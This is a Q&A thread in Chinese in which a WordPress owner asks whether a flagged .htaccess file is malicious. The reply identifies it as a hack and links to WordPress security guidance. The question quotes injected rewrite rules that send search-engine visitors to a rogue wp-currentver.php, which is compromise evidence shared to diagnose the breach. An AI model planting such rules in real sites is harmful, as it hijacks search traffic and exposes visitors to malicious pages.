Godaddy 将我的 /html/.htaccess 文件标记为可能的恶意软件。
这是恶意的吗? Fwiw,它还将 wp-currentver.php 标记为可能的恶意软件。
我的网站看起来很好,似乎运行良好。
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /wp-currentver.php?p=$1 [L]
# BEGIN WordPress
# END WordPress
【问题讨论】:
标签: php wordpress .htaccess malware
你被黑了。
这些是重定向,用于检测是否有人通过 Google 搜索结果以 Google 作为推荐人;标准 WordPress(非多站点)重写块位于 https://codex.wordpress.org/htaccess 即:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
并且文件wp-currentver.php 是恶意的,而不是 WordPress 核心。另见https://productforums.google.com/forum/#!topic/webmasters/f4Cw1k1-j6g
认真关注FAQ My site was hacked - WordPress Codex.
寻找更安全的主机。
然后看看Hardening WordPress - WordPress Codex和Brute Force Attacks - WordPress Codex中推荐的安全措施
【讨论】: